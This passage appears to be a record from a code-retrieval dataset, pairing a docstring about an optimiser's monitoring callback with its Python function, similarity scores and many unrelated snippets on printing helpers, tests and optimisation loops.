wardrobe[cloth]:\n\t\t\tprint(\"{} {}\".format(color,cloth))", "def print_info(self):\n print(\"Experiment key: \" + self.key)\n print(\"Experiment name: \" + self.name)\n print(\"Experiment path: \" + self.output_path)\n print(\"Auto-sync activated: \" + str(self.auto_sync))\n print(\"\")\n print(\"Experiment metadata: \")\n print(self.exp_metadata.to_str())", "def print_stats(ds):\n print(\"Dataset Name: \" + ds.name)\n print(\"Dataset Mode: \" + ds.mode)\n print(\"Band Count: \" + str(ds.count))\n print(\"Dataset Width: \" + str(ds.width))\n print(\"Dataset Height: \" + str(ds.height))\n print(\"Dataset Bounds: \", ds.bounds)\n print(\"Dataset Transform: \", ds.transform)\n ul = ds.transform * (0, 0)\n print(\"Upper Left Corner: \", ul)\n lr = ds.transform * (ds.width, ds.height)\n print(\"Lower Right Corner: \", lr)\n {i: dtype for i, dtype in zip(ds.indexes, ds.dtypes)}", "def print_args(args):\n _args = vars(args)\n max_length = max([len(k) for k, _ in _args.items()])\n for k, v in _args.items():\n print(' ' * (max_length - len(k)) + k + ': ' + str(v))", "def print_eval(eval_dict):\n\n status = ''.join(\n ['{}: {:.6f}, '.format(key, eval_dict[key]) for key in sorted(eval_dict)])\n print(status[:-2])", "def view_keys(dict):\n claves=list(dict.keys())\n claves.sort()\n for line in claves:\n print(line.upper(),' = ',dict[line])", "def test_antialiasing():\n images = generate_test_images()\n loaded = load_test_images(images)\n print(list(loaded.keys()))\n for description in images.keys():\n assert (images[description] == loaded[description]).all()", "def test_map_basics(self):\n self.assertDigitizerMapBasics(self.map, self.dgroup)", "def print_seeds(self):\n for key in self.CONFIG.keys():\n if \"EMI\" in key:\n print key", "def display_map():\r\n for row in range(0, len(map1)): #for all rows\r\n for column in range(0, len(map1[0])): #for all columns\r\n print(map1[row][column], end=' ')\r\n print()", "def var_sizes_check(global_dic):\n import types\n def _print(a, b):\n print(\"|{:>15}|{:>13}|\".format(a, b))\n\n _print(\"Variable\", \"Size\")\n print(\"-\"*31)\n for k, v in global_dic.items():\n if not k.startswith('_') and not isinstance(v, types.ModuleType):\n # print size of variable\n if hasattr(v, 'size'):\n try:\n _print(k, v.size)\n except:\n continue\n # print length of variable\n elif hasattr(v, '__len__'):\n try:\n _print(k, len(v))\n except:\n continue", "def helper():\n for mode in PackingMode:\n for bin_algo in PackingBin:\n for size, w, h in ('big_enough', 50, 50), ('too_small', 5, 5):\n name = '_'.join(('test', mode, bin_algo, size))\n print(\"\"\"\\\n def %s(self):\n # create bins that are %s to hold the rectangles\n p = self._common(PackingMode.%s, PackingBin.%s, %s, %s)\"\"\" %\n (name, size.replace('_', ' '), mode, bin_algo, w, h))\n if size == 'big_enough':\n print(\"\"\"\\\n # check that bins were created\n self.assertGreater(len(p.bin_list()), 0)\n # check that all of the rectangles made it in\n self.assertEqual(len(p.rect_list()), len(self.rectangles))\n\"\"\")\n else:\n print(\"\"\"\\\n # check that none of the rectangles made it in\n self.assertEqual(len(p.rect_list()), 0)\n\"\"\")", "def print_character(character):\n for k, v in character.items():\n print(str(k) + ': ' + str(v)) # Prints every key:value pair in character dictionary\n if len(character) == 8:\n print(\"Inventory:\" + str(character[7])) # If there is an inventory, then print it as well", "def pretty_keys(dictionary):\n if not dictionary:\n return []\n # - number of keys printed per line\n num = 5\n # - turn into sorted list\n keys = list(dictionary.keys())\n keys.sort()\n # - fill with blank elements to width num\n missing = (len(keys) % num)\n if missing != 0:\n to_add = num - missing\n keys.extend([''] * to_add)\n # - turn into 2D matrix\n matrix = [[keys[i+j] for i in range(0, num)]\n for j in range(0, len(keys), num)]\n # - calculate max width for each column\n len_matrix = [[len(col) for col in row] for row in matrix]\n max_len_col = [max([row[j] for row in len_matrix])\n for j in range(0, num)]\n # - pad with spaces\n matrix = [[row[j].ljust(max_len_col[j]) for j in range(0, num)]\n for row in matrix]\n # - return list of lines to print\n matrix = [' '.join(row) for row in matrix]\n return matrix", "def testFourDimensions(self):\n false1 = (True, True, True, False)\n false2 = (True, False, True, False)\n true1 = (False, True, False, True)\n true2 = (True, True, False, False)\n tt = cros_test_lib.TruthTable(inputs=(false1, false2), input_result=False)\n self.assertEquals(len(tt), pow(2, 4))\n\n # Check truth table output.\n self.assertFalse(tt.GetOutput(false1))\n self.assertFalse(tt.GetOutput(false2))\n self.assertTrue(tt.GetOutput(true1))\n self.assertTrue(tt.GetOutput(true2))\n\n # Check assertions on bad input to GetOutput.\n self.assertRaises(TypeError, tt.GetOutput, True)\n self.assertRaises(ValueError, tt.GetOutput, (True, True, True))\n\n # Check iteration over input lines.\n lines = list(tt)\n self.assertEquals((False, False, False, False), lines[0])\n self.assertEquals((False, False, False, True), lines[1])\n self.assertEquals((False, True, True, True), lines[7])\n self.assertEquals((True, True, True, True), lines[15])\n\n self._TestTableSanity(tt, lines)", "def test_overall_report_keys():\n keys = overall_data.keys()\n assert('banner_report' in keys)\n assert('rewarded_report' in keys)\n assert('interstitial_report' in keys)\n assert('overall_report' in keys)", "def printMetadata(metadata):\n\tif metadata:\n\t\tfor x in metadata:\n\t\t print(x+': {}'.format(metadata[x]) )\n\t\treturn True\n\telse:\n\t\tprint('metadata empty')\n\t\tprint('unable to find metadata at this location')\n\t\tprint('')\n\t\treturn False", "def print_dict(dictionary):\n for x,y in dictionary.items():\n print(x, y)", "def print_args():\n for key, value in vars(ARGS).items():\n print(key + ' : ' + str(value))", "def _debug_print(self, cfg, list_iterstore):\n def __print_params(iterstore, edataset):\n if (edataset not in iterstore): return\n gen = iterstore[edataset]\n if (gen is not None):\n if (gen._params is not None):\n print('{} : {}'.format(edataset, gen))\n print(\"\\tIterator Parameters: (iter_param, iter_pp_param)\")\n print(\"\\t-------------------------------------------------\")\n for key, val in gen._params.items():\n if (key.startswith('_')): continue\n print('\\t{} : {}'.format(key, val))\n \n if (gen._pp_params is not None):\n print(\"\\t-------------------------------------------------\")\n for key, val in gen._pp_params.items():\n if (key.startswith('_')): continue\n print('\\t{} : {}'.format(key, val))\n print(\"\")\n\n if (list_iterstore is None):\n return\n\n print(\"\\nNNCfg\")\n print(\"=====\")\n for key, val in cfg.__dict__.items():\n if (key.startswith('_')): continue\n print('\\t{} : {}'.format(key, val))\n\n for i, iterstore in enumerate(list_iterstore):\n print(\"\\nIterator Store:{}\".format(i))\n print(\"=================\")\n __print_params(iterstore, Dataset.TR)\n __print_params(iterstore, Dataset.VAL)\n __print_params(iterstore, Dataset.TE)\n __print_params(iterstore, Dataset.TR_OUT)\n __print_params(iterstore, Dataset.VAL_OUT)\n __print_params(iterstore, Dataset.TE_OUT)", "def printCounterByKey(counter):\n for k in counter.keys():\n print(k, counter[k])", "def print(self):\n tiles = list(map(list, zip(*self.tiles))) # transposed\n print('tiles = [')\n for row in tiles:\n print('\\t' + repr(row))\n print(']')\n print('props = [')\n for prop in self.props:\n print('\\t' + repr(prop))\n print(']')", "def _print_issue(issue, ntabs):\n for key, value in issue.items():\n if isinstance(value, dict):\n tabs = TAB*ntabs\n print('%s%s (section):' % (tabs, key))\n ntabs += 1\n print_issue(value, ntabs=ntabs)\n elif isinstance(value, bool):\n if value == False:\n tabs = TAB*ntabs\n print('%s%s parameter is missing.' % (tabs, key))\n continue\n else:\n tabs = TAB*ntabs\n print('%s%s (parameter):' % (tabs, key))\n tabs = TAB*(ntabs+1)\n print('%s%s' % (tabs, value))", "def test_print_args_dict(self):\n log_file = os.path.join(DATA_DIR, 'sample_log.txt')\n if os.path.exists(log_file):\n os.remove(log_file)\n self.assertEqual(os.path.exists(log_file), False)\n manager = execution.LogManager('MainThread', log_file)\n\n args = {}\n manager.print_args(args)\n self.assertEqual(count_lines(log_file), 4)\n os.remove(log_file)", "def show(self, keys=None, sort_keys_function=None):\n output_keys = keys or self.keys\n if not self.items:\n print(\"No items to show\")\n else:\n for item in self.__get_items(sort_keys_function):\n for output_key in output_keys:\n print(\"{0:25}: {1!s}\".format(output_key, getattr(item, self.mapping[output_key])))\n print(\"-\" * 25)", "def _validate_dimensions(config):\n logging.info(\"Checking provided dimensions are valid\")\n for feature in config.get(\"test-suites\").values():\n for test_name, test in feature.items():\n for dimensions_config in test[\"dimensions\"]:\n _validate_schedulers(config, dimensions_config.get(\"schedulers\", []))\n if [] in dimensions_config.values():\n logging.error(\"Values assigned to dimensions in test %s cannot be empty\", test_name)\n raise AssertionError" ]
[ "0.6196142", "0.6052784", "0.60204434", "0.60203207", "0.60203207", "0.5951763", "0.5832673", "0.5800634", "0.57597065", "0.57452214", "0.5724362", "0.57028264", "0.5698949", "0.5673566", "0.55920947", "0.55707216", "0.55707216", "0.55645055", "0.55363876", "0.55324614", "0.5518316", "0.55090666", "0.5499341", "0.548178", "0.5478478", "0.54699993", "0.5468296", "0.54496485", "0.5448419", "0.5438902", "0.543411", "0.54339284", "0.54306924", "0.54299736", "0.542923", "0.542923", "0.54172844", "0.5412934", "0.5412774", "0.5400309", "0.5394097", "0.5367837", "0.53635", "0.5345432", "0.53444993", "0.533711", "0.5334534", "0.5334534", "0.5322644", "0.5293944", "0.5291729", "0.52869475", "0.52826405", "0.5278914", "0.5275319", "0.5264936", "0.52647614", "0.52609456", "0.52555794", "0.5238312", "0.5233251", "0.5221002", "0.5221002", "0.52190477", "0.52118474", "0.5211352", "0.5200684", "0.5199169", "0.51973724", "0.51934826", "0.5193201", "0.5190238", "0.518372", "0.5182519", "0.51745087", "0.51735187", "0.517007", "0.51644474", "0.51624066", "0.5154629", "0.514665", "0.5140157", "0.51400524", "0.5138696", "0.51369697", "0.51302654", "0.51292753", "0.51231873", "0.5122311", "0.5121215", "0.5119518", "0.5116301", "0.5110447", "0.51083237", "0.510648", "0.5098904", "0.5092542", "0.50807106", "0.5080643", "0.5078626" ]
0.5100301
95
The callback function for the optimize process. Manages recording of iteration values and monitoring current optimiser solutions.
def callbackMonitor(dim): bstRecord.append(dim[0]) tstRecord.append(dim[1]) tskRecord.append(dim[2]) massRecord.append(mass(dim)) rsfSkinRecord.append(skinBuckle(dim)+1) rsfStiffRecord.append(stiffenerBuckle(dim)+1) rsfMatRecord.append(matFail(dim)+1.1) rsfEulerRecord.append(eulerBuckle(dim)+1.1) print(dim, mass(dim))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def Optimize(self):\n self._OpenOutputFiles()\n while self.n_iter < self.n_maxiter and not self.is_converged:\n self.n_iter += 1\n self._ChooseStepDirection(self.opt_type)\n self._LineSearch(-1.0 * self.step_dir)\n self._UpdateEnergy()\n self._UpdateGradient()\n self.traj.AppendStep(self.mol)\n self._UpdateCriteria()\n self._CheckConvergence()\n self._PrintStatus()\n self._CloseOutputFiles()", "def optimize(self):\n \n if self.verbose:\n print('Starting grid search with bounds: [' + \\\n ';'.join(['%5g to %5g']*len(self.steps))%tuple([(self.steps[i][0], self.steps[i][-1]) for i in range(len(self.steps))]) +']')\n\n for params in self._get_next_point():\n self.transform.set_params(params)\n\n v, _ = self.measure.value_and_derivatives(self.transform)\n\n if v < self.best_value:\n self.best_value = v\n self.best_params = params\n# print('New best value %2.4f at ('%v, ', '.join(['%8.3f']*len(params))%tuple(params), ')')\n\n self.value_history.append(v)\n self.last_value = v\n self.iteration += 1\n\n if self.report_freq > 0 and (self.iteration % self.report_freq == 0) and self.report_func is not None:\n self.report_func(self)\n\n # Set the best transform\n self.transform.set_params(self.best_params)\n self.last_value = self.best_value\n return self.best_value", "def _optimization_loop(self, iteration=0):\n self.logger.print_optimization_header()\n\n while iteration < self.iterations:\n try:\n self._execute_experiment()\n except RepeatedExperimentError:\n # G.debug_(F'Skipping repeated Experiment: {_ex!s}\\n')\n if len(self.similar_experiments) + len(self.tested_keys) >= self.search_space_size:\n G.log_(f\"Hyperparameter search space has been exhausted\")\n break\n self.skipped_iterations += 1\n continue\n except StopIteration:\n if len(self.similar_experiments) + len(self.tested_keys) >= self.search_space_size:\n G.log_(f\"Hyperparameter search space has been exhausted\")\n break\n # G.debug_(f'Re-initializing hyperparameter grid after testing {len(self.tested_keys)} keys')\n self._set_hyperparameter_space()\n continue\n\n self.logger.print_result(\n self.current_hyperparameters_list,\n self.current_score,\n experiment_id=self.current_experiment.experiment_id,\n )\n\n if (\n (self.best_experiment is None) # First evaluation\n or (self.do_maximize and (self.best_score < self.current_score)) # New best max\n or (not self.do_maximize and (self.best_score > self.current_score)) # New best min\n ):\n self.best_experiment = self.current_experiment.experiment_id\n self.best_score = self.current_score\n\n iteration += 1", "def go(self):\n if self.model_initializer is None:\n raise ValueError(\"Experiment guidelines must be set before starting optimization\")\n\n _reporter_params = dict(dict(do_maximize=self.do_maximize), **self.reporter_parameters)\n self.logger = OptimizationReporter([_.name for _ in self.dimensions], **_reporter_params)\n\n self.tested_keys = []\n self._set_hyperparameter_space()\n self._find_similar_experiments()\n\n loop_start_time = datetime.now()\n self._optimization_loop()\n loop_end_time = datetime.now()\n G.log_(f\"Optimization loop completed in {loop_end_time - loop_start_time}\")\n G.log_(f'Best score was {self.best_score} from Experiment \"{self.best_experiment}\"')\n self._clean_up_optimization()", "def iterations(self):\n i = 0\n stateVectorConv = self.stateVectorConvThreshold * 1.0e6\n n = len(self.model.stateVector)\n self.answer = None\n \n while ((i < self.maxiter) \n and (stateVectorConv > self.stateVectorConvThreshold)\n ):\n \n F, K = self.model()\n \n if np.any(np.isnan(F)) or np.any(np.isnan(K)):\n m = \"Iteration {0} failure of model.\"\n raise OptimalEstimationException(m.format(i))\n \n if self.model.verbose > 0:\n self.model.plot(i+1, stateVectorConv)\n \n try:\n self.DecomposeJacobian(K)\n except np.linalg.LinAlgError:\n m = \"Iteration {0} failure in decomposition.\"\n raise OptimalEstimationException(m.format(i))\n \n statevectorOffset = (self.V.T * self.priorSinvh * \n np.matrix(np.array(self.model.stateVector) - np.array(self.model.prior) ).T)\n measurementOffset = (self.U.T * self.errSinvh * \n np.matrix(self.model.observation - F).T)\n \n newState = np.matrix((self.w * \n (measurementOffset.A1 + \n self.w * statevectorOffset.A1))/(self.w**2+1.0)).T\n newState = self.priorSh * self.V * newState\n newState = newState.A1 + self.model.prior\n \n stateVectorConv = ((np.matrix(newState - self.model.stateVector) * \n self.Sinv * np.matrix(newState - self.model.stateVector).T)/n)[0,0]\n self.model.stateVector = newState\n\n if i == 0:\n \n stateVectorConv = self.stateVectorConvThreshold * 1.0e6\n \n print('cost Function for iteration {}:'.format(i), self.costFunction)\n\n i += 1\n \n F, K = self.model()\n if self.model.verbose > 0:\n self.model.plot(i+1, stateVectorConv)\n \n try:\n self.DecomposeJacobian(K)\n except np.linalg.LinAlgError:\n raise OptimalEstimationException(\"Failure in decomposition.\")\n \n Wplus2 = np.matrix(np.diag(1.0/(self.w**2+1.0)))\n self.model.covariance = (self.priorSh * self.V * Wplus2 * \n self.V.T * self.priorSh)\n \n\n \n return i, stateVectorConv", "def optimize(self):\n self.vbe_step()\n self.compute_responsibilities()\n self.compute_sufficient_stats()\n self.vbmstep()", "def solve(self):\n\n # Open status display\n fmtstr, nsep = self.display_start()\n\n # Start solve timer\n self.timer.start(['solve', 'solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Main optimisation iterations\n for self.k in range(self.k, self.k + self.opt['MaxMainIter']):\n\n # Update record of X and Y from previous iteration\n self.on_iteration_start()\n\n # Compute backtracking\n if self.opt['Backtrack'] is not None and self.k >= 0:\n self.timer.stop('solve_wo_btrack')\n # Compute backtracking\n self.backtrack.update(self)\n self.timer.start('solve_wo_btrack')\n else:\n # Compute just proximal step\n self.xstep()\n # Update by combining previous iterates\n self.ystep()\n\n # Compute residuals and stopping thresholds\n self.timer.stop(['solve_wo_rsdl', 'solve_wo_btrack'])\n if not self.opt['FastSolve']:\n frcxd, adapt_tol = self.compute_residuals()\n self.timer.start('solve_wo_rsdl')\n\n # Compute and record other iteration statistics and\n # display iteration stats if Verbose option enabled\n self.timer.stop(['solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n if not self.opt['FastSolve']:\n itst = self.iteration_stats(self.k, frcxd)\n self.itstat.append(itst)\n self.display_status(fmtstr, itst)\n self.timer.start(['solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Call callback function if defined\n if self.opt['Callback'] is not None:\n if self.opt['Callback'](self):\n break\n\n # Stop if residual-based stopping tolerances reached\n if not self.opt['FastSolve']:\n if frcxd < adapt_tol:\n break\n\n # Increment iteration count\n self.k += 1\n\n # Record solve time\n self.timer.stop(['solve', 'solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Print final separator string if Verbose option enabled\n self.display_end(nsep)\n\n return self.getmin()", "def _optimise(self):\n pass", "def optimizer_callback(current_theta):\n\n global optimizer_data\n global optimizer_len\n\n optimizer_data.append(current_theta)\n optimizer_len += 1\n return False", "def optimize(self, iterations=1000):\r\n prev = None\r\n finalx = None\r\n finaly = None\r\n while iterations:\r\n maxei, eis = self.acquisition()\r\n new_y = self.f(maxei)\r\n if maxei == prev:\r\n break\r\n self.gp.update(maxei, new_y)\r\n pycodehack = finaly is None or self.minimize and finaly > new_y\r\n if ((pycodehack or not self.minimize and finaly < new_y)):\r\n finaly = new_y\r\n finalx = maxei\r\n prev = maxei\r\n iterations -= 1\r\n return finalx, finaly", "def accept_optimize():\n pass", "def run_optimization(self):\n # Get batch\n (obs, action, old_logp, old_value, return_, advantage) = self.buffer.eject()\n\n # Train pi\n print(\"-\" * 20 + \"\\nPi Update\" + \"\\n\" + \"-\" * 20)\n (policy_loss, entropy,\n kl_divergence, clipping_fraction, steps) = self.update_actor(obs, action, old_logp, advantage)\n\n # Train value function\n print(\"-\" * 20 + \"\\nValue Function Update\" + \"\\n\" + \"-\" * 20)\n (value_loss,\n explained_variance) = self.update_critic(obs, old_value, return_)\n\n # Logging\n self.update_counter += 1\n self.log_update(policy_loss, entropy, kl_divergence, clipping_fraction,\n value_loss, explained_variance, steps)\n\n # Update learning rate\n self.decay_lr()\n\n # Save current weights (overwrites previous weights)\n self.save_weights()\n\n # Empty scenario counter\n self.scenario_counter = dict.fromkeys(self.scenario_counter, 0)", "def _optimization_closure(self, iteration, step):\n aug = self._get_augmentation(iteration)\n if iteration == self.num_iter_per_step - 1:\n reg_noise_std = 0\n aug = 0\n else:\n reg_noise_std = (1 / 1000.) * (iteration // 400)\n # creates left_net_inputs and right_net_inputs by adding small noise\n clean_nets_inputs = [clean_net_input[aug] + (clean_net_input[aug].clone().normal_() * reg_noise_std)\n for clean_net_input in self.clean_nets_inputs]\n watermark_net_input = self.watermark_net_input[aug] # + (self.watermark_net_input[aug].clone().normal_() * reg_noise_std)\n mask_net_input = self.mask_net_input[aug]\n # applies the nets\n self.clean_nets_outputs = [clean_net(clean_net_input) for clean_net, clean_net_input\n in zip(self.clean_nets, clean_nets_inputs)]\n self.watermark_net_output = self.watermark_net(watermark_net_input)\n self.mask_net_output = self.mask_net(mask_net_input)\n self.total_loss = 0\n self.blur = 0\n\n self.total_loss += sum(self.l1_loss(self.watermark_net_output * self.mask_net_output +\n clean_net_output * (1 - self.mask_net_output), image_torch[aug])\n for clean_net_output, image_torch in zip(self.clean_nets_outputs, self.images_torch))\n self.total_loss.backward(retain_graph=True)", "def Optimize(self):\n return _gmat_py.ExternalOptimizer_Optimize(self)", "def fit(self):\n if self.minimizer == \"differential_evolution\":\n kwargs = {\"maxiter\": self._maxiter}\n elif self.minimizer == \"shgo\":\n kwargs = {\"options\": {\"maxiter\": self._maxiter,\n \"jac\": self.cost_func.jac_cost}}\n elif self.minimizer == \"dual_annealing\":\n kwargs = {\"maxiter\": self._maxiter, \"local_search_options\": {\n \"jac\": self.cost_func.jac_cost}}\n fun = self.cost_func.eval_cost\n bounds = self.value_ranges\n algorithm = getattr(optimize, self.minimizer)\n result = algorithm(fun, bounds, **kwargs)\n self._popt = result.x\n if result.success:\n self._status = 0\n elif \"Maximum number of iteration\" in result.message:\n self._status = 1\n else:\n self._status = 2", "def run_and_store(self):\n # Initialization assumptions\n z = self.draw_normal_initial()\n gradient = self.cv_gradient_initial(z)\n gradient[np.isnan(gradient)] = 0\n variance = np.power(gradient,2) \n final_parameters = self.current_parameters()\n final_samples = 1\n\n # Create optimizer\n if self.optimizer == 'ADAM':\n self.optim = ADAM(final_parameters, variance, self.learning_rate, 0.9, 0.999)\n elif self.optimizer == 'RMSProp':\n self.optim = RMSProp(final_parameters, variance, self.learning_rate, 0.99)\n\n # Stored updates\n stored_means = np.zeros((self.iterations,len(final_parameters)/2))\n stored_predictive_likelihood = np.zeros(self.iterations)\n\n # Record elbo\n if self.record_elbo is True:\n elbo_records = np.zeros(self.iterations)\n else:\n elbo_records = None\n\n for i in range(self.iterations):\n gradient = self.cv_gradient(self.draw_normal())\n gradient[np.isnan(gradient)] = 0\n new_parameters = self.optim.update(gradient)\n self.change_parameters(new_parameters)\n\n stored_means[i] = self.optim.parameters[::2]\n stored_predictive_likelihood[i] = self.neg_posterior(stored_means[i])\n\n if self.printer is True:\n self.print_progress(i,self.optim.parameters[::2])\n\n # Construct final parameters using final 10% of samples\n if i > self.iterations-round(self.iterations/10):\n final_samples += 1\n final_parameters = final_parameters+self.optim.parameters\n\n if self.record_elbo is True:\n elbo_records[i] = self.get_elbo(self.optim.parameters[::2])\n\n final_parameters = final_parameters/float(final_samples)\n self.change_parameters(final_parameters)\n final_means = np.array([final_parameters[el] for el in range(len(final_parameters)) if el%2==0])\n final_ses = np.array([final_parameters[el] for el in range(len(final_parameters)) if el%2!=0])\n\n if not self.quiet_progress:\n print(\"\")\n print(\"Final model ELBO is \" + str(-self.neg_posterior(final_means)-self.create_normal_logq(final_means)))\n return self.q, final_means, final_ses, stored_means, stored_predictive_likelihood, elbo_records", "def run_and_store(self):\n # Initialization assumptions\n z = self.draw_normal_initial()\n gradient = self.cv_gradient_initial(z)\n gradient[np.isnan(gradient)] = 0\n variance = np.power(gradient,2) \n final_parameters = self.current_parameters()\n final_samples = 1\n\n # Create optimizer\n if self.optimizer == 'ADAM':\n self.optim = ADAM(final_parameters, variance, self.learning_rate, 0.9, 0.999)\n elif self.optimizer == 'RMSProp':\n self.optim = RMSProp(final_parameters, variance, self.learning_rate, 0.99)\n\n # Stored updates\n stored_means = np.zeros((self.iterations,len(final_parameters)/2))\n stored_predictive_likelihood = np.zeros(self.iterations)\n\n # Record elbo\n if self.record_elbo is True:\n elbo_records = np.zeros(self.iterations)\n else:\n elbo_records = None\n\n for i in range(self.iterations):\n gradient = self.cv_gradient(self.draw_normal())\n gradient[np.isnan(gradient)] = 0\n new_parameters = self.optim.update(gradient)\n self.change_parameters(new_parameters)\n\n stored_means[i] = self.optim.parameters[::2]\n stored_predictive_likelihood[i] = self.neg_posterior(stored_means[i])\n\n if self.printer is True:\n self.print_progress(i,self.optim.parameters[::2])\n\n # Construct final parameters using final 10% of samples\n if i > self.iterations-round(self.iterations/10):\n final_samples += 1\n final_parameters = final_parameters+self.optim.parameters\n\n if self.record_elbo is True:\n elbo_records[i] = self.get_elbo(self.optim.parameters[::2])\n\n final_parameters = final_parameters/float(final_samples)\n self.change_parameters(final_parameters)\n final_means = np.array([final_parameters[el] for el in range(len(final_parameters)) if el%2==0])\n final_ses = np.array([final_parameters[el] for el in range(len(final_parameters)) if el%2!=0])\n\n if not self.quiet_progress:\n print(\"\")\n print(\"Final model ELBO is \" + str(-self.full_neg_posterior(final_means)-self.create_normal_logq(final_means)))\n return self.q, final_means, final_ses, stored_means, stored_predictive_likelihood, elbo_records", "def run_qae_optimization(training_states, n_repetitions, exact=no_noise, noisy=gate_error):\n result_list = []\n def proxy(params, training_states, n_repetitions, exact=no_noise, noisy=gate_error):\n \"\"\"Embedded function version\n \"\"\"\n input_list = fix_list(params, all_param_array=all_param, var_param_array=var_param, fixed_vals_array=fixed_vals)\n fidelities = []\n for training_state in training_states:\n fid = cusp_stage2.compute_stage2_cost_function(*input_list, alpha=training_state, n_repetitions=n_repetitions,\n exact=exact, noisy=noisy)\n fidelities.append(fid)\n avg_fid = np.mean(fidelities)\n result_list.append(1-avg_fid)\n print(1-avg_fid)\n return 1. - avg_fid\n\n \n # Initialize parameters\n half_turn_min = 0\n half_turn_max = 2\n init_params = np.random.uniform(low=half_turn_min, high=half_turn_max,\n size=num_param)\n\n # Optimization using Nelder-Mead.\n h2_qae_wrap = lambda params: proxy(params, training_states=training_states,\n n_repetitions=n_repetitions, exact=exact, noisy=noisy)\n \n if noisy:\n maxiter = 60\n else:\n maxiter = None\n \n res = minimize(h2_qae_wrap, init_params, args=(),\n method='Nelder-Mead', tol=None, \n options={'disp': False, 'maxiter': maxiter, 'xatol': 0.001,\n 'return_all': False, 'fatol': 0.001})\n np.savetxt('stage2_data.csv',result_list, delimiter=',')\n return res.x", "def example():\n Optimizer = BFGS(f, g)\n startPoint = 100 * numpy.ones(2);\n res = Optimizer.optimize(startPoint,\n epsilon=1e-5,\n maxIterations=10)\n print res\n pass", "def optimize(self, optimizer=None, start=None, messages=False, max_iters=1000, ipython_notebook=True, clear_after_finish=False, **kwargs):\n self.inference_method.on_optimization_start()\n try:\n super(GPMSGP, self).optimize(optimizer, start, messages, max_iters, ipython_notebook, clear_after_finish, **kwargs)\n except KeyboardInterrupt:\n print(\"KeyboardInterrupt caught, calling on_optimization_end() to round things up\")\n self.inference_method.on_optimization_end()\n raise\n \n self.posterior_prediction = self.inference_method.update_prediction_vectors(self.kern,self.posterior,self.grad_dict,self.likelihood)", "def _on_step(self) -> None:\n self._n_calls += 1\n # Account for multiple environments\n # each call to step() corresponds to n_envs transitions\n if self._n_calls % max(self.target_update_interval // self.n_envs, 1) == 0:\n polyak_update(self.q_net.parameters(), self.q_net_target.parameters(), self.tau)\n # Copy running stats, see GH issue #996\n polyak_update(self.batch_norm_stats, self.batch_norm_stats_target, 1.0)\n\n self.exploration_rate = self.exploration_schedule(self._current_progress_remaining)\n self.logger.record(\"rollout/exploration_rate\", self.exploration_rate)", "def optimization_step(self):\n \n if \"CSS\" in self.algorithm:\n \n input_dict = {self.x: self.train_inputs[self.minibatch_set,:]}\n \n var_list = [self.x_tilda, self.minibatch_set]\n \n if (self.num_samples > 0) and (not self.mixture):\n \n if ((self.mf_steps > 0) and self.alpha >0) or\\\n self.gibbs_steps > 0: \n \n var_list.append(self.sampler_theta)\n \n elif \"CD\" in self.algorithm:\n \n input_dict = {self.x : self.train_inputs[self.minibatch_set,:]} \n \n var_list = [self.minibatch_set]\n \n var_list.append(self.learning_rate)\n \n if self.use_momentum:\n \n var_list.append(self.momentum)\n \n output_vars = [self.pseudo_cost]\n \n if self.report_p_tilda:\n \n output_vars.append(self.p_tilda)\n \n else:\n \n output_vars.append(theano.shared(0))\n \n opt_step = theano.function(inputs = var_list,\n outputs = output_vars,\n updates = self.updates,\n givens = input_dict,\n on_unused_input='warn')\n \n return opt_step", "def opt_wrapper(m, **kwargs):\r\n m.optimize(**kwargs)\r\n return m.optimization_runs[-1]", "def algorithm_loop(self):", "def propose_optimize():\n pass", "def run(self, C, p0 = None):\n global algorithm \n algorithm = AdaptiveMM(self.g, C, p0 = p0, lambda0 = 2000)\n solve()", "def Solve(self, cost, termination=None, ExtraArgs=(), **kwds):\n # process and activate input settings\n sigint_callback = kwds.pop('sigint_callback', None)\n settings = self._process_inputs(kwds)\n disp = settings['disp'] if 'disp' in settings else False\n echo = settings['callback'] if 'callback' in settings else None\n# for key in settings:\n# exec \"%s = settings['%s']\" % (key,key)\n if disp in ['verbose', 'all']: verbose = True\n else: verbose = False\n #-------------------------------------------------------------\n\n from python_map import python_map\n if self._map != python_map:\n #FIXME: EvaluationMonitor fails for MPI, throws error for 'pp'\n from mystic.monitors import Null\n evalmon = Null()\n else: evalmon = self._evalmon\n fcalls, cost = wrap_function(cost, ExtraArgs, evalmon)\n\n # set up signal handler\n #self._EARLYEXIT = False\n self._generateHandler(sigint_callback) \n\n # activate signal_handler\n #import threading as thread\n #mainthread = isinstance(thread.current_thread(), thread._MainThread)\n #if mainthread: #XXX: if not mainthread, signal will raise ValueError\n import signal\n if self._handle_sigint:\n signal.signal(signal.SIGINT,self.signal_handler)\n\n # register termination function\n if termination is not None: self.SetTermination(termination)\n\n # get the nested solver instance\n solver = self._AbstractEnsembleSolver__get_solver_instance()\n #-------------------------------------------------------------\n\n # generate starting points\n initial_values = self._InitialPoints()\n\n # run optimizer for each grid point\n from copy import deepcopy as _copy\n op = [_copy(solver) for i in range(len(initial_values))]\n #cf = [cost for i in range(len(initial_values))]\n vb = [verbose for i in range(len(initial_values))]\n cb = [echo for i in range(len(initial_values))] #XXX: remove?\n at = self.id if self.id else 0 # start at self.id\n id = range(at,at+len(initial_values))\n\n # generate the local_optimize function\n def local_optimize(solver, x0, rank=None, disp=False, callback=None):\n from copy import deepcopy as _copy\n from mystic.tools import isNull\n solver.id = rank\n solver.SetInitialPoints(x0)\n if solver._useStrictRange: #XXX: always, settable, or sync'd ?\n solver.SetStrictRanges(min=solver._strictMin, \\\n max=solver._strictMax) # or lower,upper ?\n solver.Solve(cost, disp=disp, callback=callback)\n sm = solver._stepmon\n em = solver._evalmon\n if isNull(sm): sm = ([],[],[],[])\n else: sm = (_copy(sm._x),_copy(sm._y),_copy(sm._id),_copy(sm._info))\n if isNull(em): em = ([],[],[],[])\n else: em = (_copy(em._x),_copy(em._y),_copy(em._id),_copy(em._info))\n return solver, sm, em\n\n # map:: solver = local_optimize(solver, x0, id, verbose)\n results = self._map(local_optimize, op, initial_values, id, \\\n vb, cb, **self._mapconfig)\n\n # save initial state\n self._AbstractSolver__save_state()\n #XXX: HACK TO GET CONTENT OF ALL MONITORS\n # reconnect monitors; save all solvers\n from mystic.monitors import Monitor\n while results: #XXX: option to not save allSolvers? skip this and _copy\n 